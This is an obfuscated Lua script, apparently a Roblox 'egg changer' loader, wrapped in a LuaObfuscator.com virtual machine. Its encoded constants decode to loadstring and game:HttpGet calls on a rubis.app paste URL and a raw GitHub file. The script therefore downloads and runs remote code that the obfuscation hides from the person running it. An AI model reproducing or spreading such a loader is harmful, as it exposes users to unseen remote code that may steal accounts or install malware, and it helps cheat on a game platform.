--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v97=v5(v83,v19);v19=nil;return v97;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/(2^(v32-((1 + 1) -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -(1 + 0)))) + (878 -(282 + 595)))) ;return v84-(v84%(620 -(555 + (1701 -(1523 + 114))))) ;else local v85=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and 1) or (927 -(214 + 713)) ;end end local function v21() local v34=0;local v35;while true do if (v34==((1271 -(226 + 1044)) + 0)) then return v35;end if (v34==((0 -0) -0)) then v35=v1(v16,v18,v18);v18=v18 + ((1183 -(32 + 85)) -(68 + 997)) ;v34=1;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v37 * (57 + 199)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + 4 ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -(55952 -(87 + 263)))) + (v39 * (469 -213)) + v38 ;end local function v24() local v42=(706 -526) -(1 + 66 + 113) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 -2)) then v45=1 + 0 ;v46=(v20(v44,2 -(3 -2) ,15 + 5 ) * (((6 + 1) -5)^32)) + v43 ;v42=(2009 -(87 + 968)) -(802 + 150) ;end if (v42==(7 -4)) then if (v47==((0 -0) -0)) then if (v46==(0 + 0)) then return v48 * (0 + 0) ;else local v98=0;while true do if (v98==(997 -(915 + 75 + 7))) then v47=2 -1 ;v45=(1747 -(760 + 987)) + 0 ;break;end end end elseif (v47==(2691 -644)) then return ((v46==(1187 -(1069 + 118))) and (v48 * ((2 -1)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(3632 -2609) ) * (v45 + (v46/((1 + 1)^((2040 -(1789 + 124)) -75)))) ;end if (v42==(1 + 1)) then v47=v20(v44,37 -16 ,31 + 0 );v48=((v20(v44,(822 -(745 + 21)) -24 )==(1081 -(351 + 669 + 60))) and  -(792 -(368 + 423))) or (3 -(4 -2)) ;v42=21 -((1423 -(447 + 966)) + 8) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=443 -(416 + (71 -45)) ;end end end local function v25(v49) local v50=1817 -(1703 + 114) ;local v51;local v52;while true do if (v50==(378 -(85 + 291))) then v52={};for v89=702 -((1323 -947) + 325) , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=(5 -1) -1 ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then v49=v23();if (v49==((162 + 1018) -(1123 + (78 -21)))) then return "";end end v50=1 + 0 ;end if ((8 -5)==v50) then return v6(v52);end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;v50=2;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 1587 -(412 + 1175) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v67=(function() return 0;end)();while true do if (v67==0) then if (v53==(0 -0)) then v54=(function() return function(v102,v103,v104) local v105=(function() return 0;end)();local v106=(function() return;end)();while true do if (v105==0) then v106=(function() return 0 + 0 ;end)();while true do if (v106==(0 + 0)) then local v177=(function() return 0;end)();while true do if (0==v177) then v102[v103-#"<" ]=(function() return v104();end)();return v102,v103,v104;end end end end break;end end end;end)();v55=(function() return {};end)();v56=(function() return {};end)();v57=(function() return {};end)();v53=(function() return 1;end)();end if (v53==(1 -0)) then local v95=(function() return 0;end)();while true do if (v95~=(1274 -(388 + 886))) then else v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v95=(function() return 1 + 0 ;end)();end if (2==v95) then v53=(function() return 2;end)();break;end if (v95==1) then v60=(function() return {};end)();for v123= #"}",v59 do local v124=(function() return 0;end)();local v125=(function() return;end)();local v126=(function() return;end)();while true do if (v124~=(561 -(306 + 254))) then else if (v125== #":") then v126=(function() return v21()~=0 ;end)();elseif (v125==(1 + 1)) then v126=(function() return v24();end)();elseif (v125== #"xxx") then v126=(function() return v25();end)();end v60[v123]=(function() return v126;end)();break;end if (v124==(0 -0)) then v125=(function() return v21();end)();v126=(function() return nil;end)();v124=(function() return 1468 -(899 + 568) ;end)();end end end v95=(function() return 2;end)();end end end v67=(function() return 1 + 0 ;end)();end if (v67==(2 -1)) then if (v53~=(605 -(268 + 335))) then else v58[ #"gha"]=(function() return v21();end)();for v99= #":",v23() do local v100=(function() return v21();end)();if (v20(v100, #"}", #"]")~=0) then else local v118=(function() return 290 -(60 + 230) ;end)();local v119=(function() return;end)();local v120=(function() return;end)();local v121=(function() return;end)();local v122=(function() return;end)();while true do if (v118~=(573 -(426 + 146))) then else v121=(function() return nil;end)();v122=(function() return nil;end)();v118=(function() return 2;end)();end if (v118==0) then local v171=(function() return 0;end)();while true do if ((1 + 0)==v171) then v118=(function() return 1;end)();break;end if (v171~=0) then else v119=(function() return 1456 -(282 + 1174) ;end)();v120=(function() return nil;end)();v171=(function() return 812 -(569 + 242) ;end)();end end end if (v118==(5 -3)) then while true do if (v119~= #"gha") then else if (v20(v121, #"asd", #"nil")~= #" ") then else v122[ #"xnxx"]=(function() return v60[v122[ #"http"]];end)();end v55[v99]=(function() return v122;end)();break;end if (v119~=(1 + 1)) then else local v181=(function() return 1024 -(706 + 318) ;end)();local v182=(function() return;end)();while true do if (v181==0) then v182=(function() return 1251 -(721 + 530) ;end)();while true do if (v182~=1) then else v119=(function() return  #"asd";end)();break;end if (v182==(1271 -(945 + 326))) then if (v20(v121, #"!", #">")~= #"~") then else v122[2]=(function() return v60[v122[2]];end)();end if (v20(v121,4 -2 ,2)== #"{") then v122[ #"gha"]=(function() return v60[v122[ #"asd"]];end)();end v182=(function() return 1 + 0 ;end)();end end break;end end end if (v119~=0) then else local v183=(function() return 0;end)();while true do if (v183~=(700 -(271 + 429))) then else v120=(function() return v20(v100,2 + 0 , #"asd");end)();v121=(function() return v20(v100, #"0313",6);end)();v183=(function() return 1;end)();end if (v183==(1501 -(1408 + 92))) then v119=(function() return  #"{";end)();break;end end end if (v119== #".") then local v184=(function() return 1086 -(461 + 625) ;end)();local v185=(function() return;end)();while true do if (0==v184) then v185=(function() return 0;end)();while true do if (v185==(1288 -(993 + 295))) then v122=(function() return {v22(),v22(),nil,nil};end)();if (v120==0) then local v190=(function() return 0;end)();local v191=(function() return;end)();while true do if (v190==(0 + 0)) then v191=(function() return 1171 -(418 + 753) ;end)();while true do if (v191==0) then v122[ #"asd"]=(function() return v22();end)();v122[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v120== #":") then v122[ #"xnx"]=(function() return v23();end)();elseif (v120==(1 + 1)) then v122[ #"xnx"]=(function() return v23() -((1 + 1)^(5 + 11)) ;end)();elseif (v120== #"-19") then local v196=(function() return 0 + 0 ;end)();local v197=(function() return;end)();while true do if (0==v196) then v197=(function() return 0;end)();while true do if (v197==0) then v122[ #"gha"]=(function() return v23() -((531 -(406 + 123))^(1785 -(1749 + 20))) ;end)();v122[ #"http"]=(function() return v22();end)();break;end end break;end end end v185=(function() return 1 + 0 ;end)();end if (v185~=(1323 -(1249 + 73))) then else v119=(function() return 2;end)();break;end end break;end end end end break;end end end end for v101= #"<",v23() do v56,v101,v28=(function() return v54(v56,v101,v28);end)();end return v58;end break;end end end end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[(598 + 549) -(466 + 679) ];local v66=v61[6 -3 ];return function(...) local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=1 -0 ;local v73= -(2 -1);local v74={};local v75={...};local v76=v12("#",...) -(1901 -(106 + 1794)) ;local v77={};local v78={};for v86=(0 -0) + 0 ,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 + 0 + 0 ];else v78[v86]=v75[v86 + (2 -1) ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[2 -1 ];if (v81<=(118 -((167 -(92 + 71)) + 55 + 55))) then if ((v81<=(1505 -(363 + 1141))) or (1997>3815)) then if (v81==(584 -((95 -38) + 527))) then v78[v80[5 -3 ]]=v80[1430 -(41 + 1386) ]~=(103 -((782 -(574 + 191)) + 86)) ;else local v108=1975 -(1913 + 62) ;local v109;local v110;local v111;local v112;local v113;while true do if (v108==(5 + 2)) then v80=v68[v72];v78[v80[2 + 0 ]]=v63[v80[6 -3 ]];v72=v72 + (2 -1) ;v80=v68[v72];v113=v80[168 -(122 + 37 + 7) ];v108=13 -5 ;end if ((3465>1913) and (v108==(0 -0))) then v109=nil;v110,v111=nil;v112=nil;v113=nil;v78[v80[2 + 0 ]]=v63[v80[1 + 2 ]];v108=1 -0 ;end if (v108==((771 -463) -(244 + 60))) then v110,v111=v71(v78[v113](v13(v78,v113 + 1 ,v80[68 -(30 + 35) ])));v73=(v111 + v113) -(1 + 0) ;v109=476 -(41 + 435) ;for v172=v113,v73 do v109=v109 + (1002 -(938 + 63)) ;v78[v172]=v110[v109];end v72=v72 + (1258 -(1043 + 214)) ;v108=4 + 1 ;end if (v108==(1128 -(936 + 189))) then v80=v68[v72];v78[v80[7 -5 ]]=v80[1215 -(323 + 889) ]~=(0 + 0 + 0) ;v72=v72 + (2 -1) ;v80=v68[v72];v113=v80[582 -(361 + 219) ];v108=10 -6 ;end if (v108==((1177 -(254 + 595)) -((179 -(55 + 71)) + 267))) then v112=v78[v80[1 + 2 ]];v78[v113 + (414 -((19 -4) + 398)) ]=v112;v78[v113]=v112[v80[986 -(18 + 964) ]];break;end if (v108==(22 -16)) then v78[v80[2 + (1790 -(573 + 1217)) ]]();v72=v72 + 1 + 0 ;v80=v68[v72];v78[v80[1020 -((1930 -1233) + 321) ]]=v63[v80[3]];v72=v72 + (851 -(20 + 830)) ;v108=14 -7 ;end if (v108==(2 -1)) then v72=v72 + 1 + 0 ;v80=v68[v72];v113=v80[128 -(116 + 10) ];v112=v78[v80[1 + 2 ]];v78[v113 + (739 -(542 + 196)) ]=v112;v108=(1 + 2) -1 ;end if (v108==(2 + 3)) then v80=v68[v72];v113=v80[2 + 0 ];v78[v113]=v78[v113](v13(v78,v113 + 1 + 0 ,v73));v72=v72 + (2 -(1 -0)) ;v80=v68[v72];v108=15 -9 ;end if (v108==(1553 -(1126 + 425))) then v78[v113]=v112[v80[409 -((1057 -(714 + 225)) + 287) ]];v72=v72 + ((8 -5) -2) ;v80=v68[v72];v78[v80[(1564 -441) -(118 + 1003) ]]=v80[8 -5 ];v72=v72 + (441 -(382 + 58)) ;v108=380 -(142 + 235) ;end end end elseif ((733<1819) and (v81<=(9 -7))) then do return;end elseif (v81>(1 + 2)) then local v127=v80[2];local v128,v129=v71(v78[v127](v13(v78,v127 + (978 -(60 + 493 + 424)) ,v80[8 -5 ])));v73=(v129 + v127) -((1 -0) -0) ;local v130=0 + 0 ;for v167=v127,v73 do local v168=0 + (806 -(118 + 688)) ;while true do if (v168==((48 -(25 + 23)) + 0 + 0)) then v130=v130 + (1691 -(1121 + 569)) ;v78[v167]=v128[v130];break;end end end else v78[v80[(2102 -(927 + 959)) -((73 -51) + 192) ]]=v80[2 + 1 ];end elseif (v81<=(4 + 3)) then if ((v81<=(10 -5)) or (4395==4755)) then v78[v80[(737 -(16 + 716)) -3 ]]=v63[v80[6 -3 ]];elseif (v81==(11 -5)) then local v133=v80[2 -0 ];local v134=v78[v80[1 + (99 -(11 + 86)) ]];v78[v133 + (4 -3) ]=v134;v78[v133]=v134[v80[(1846 -1089) -(239 + 514) ]];else v78[v80[1 + 1 ]]();end elseif ((v81<=(1337 -(797 + (817 -(175 + 110))))) or (3793<2369)) then local v116=0 + 0 ;local v117;while true do if ((0 + 0)==v116) then v117=v80[4 -(4 -2) ];v78[v117]=v78[v117](v13(v78,v117 + (237 -(141 + 95)) ,v73));break;end end elseif (v81>((5972 -4761) -(373 + 829))) then v72=v80[7 -4 ];elseif ((v78[v80[(2529 -(503 + 1293)) -(476 + 255) ]]==v80[1134 -(369 + 761) ]) or (4084==265)) then v72=v72 + (2 -1) + 0 ;else v72=v80[2 + 1 ];end v72=v72 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F663457387961767075773753587559692F726177034A3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F47726F7744757065722F652Q676368616E6765722F726566732F68656164732F6D61696E2F652Q6700153Q0012033Q00013Q0026093Q00010001000100040A3Q00010001001205000100023Q001201000200033Q00202Q00020002000400122Q000400056Q000500016Q000200056Q00013Q00024Q00010001000100122Q000100023Q00122Q000200033Q00202Q000200020004001203000400064Q0004000200044Q000800013Q00022Q000700010001000100040A3Q0014000100040A3Q000100012Q00023Q00017Q00",v9(),...);
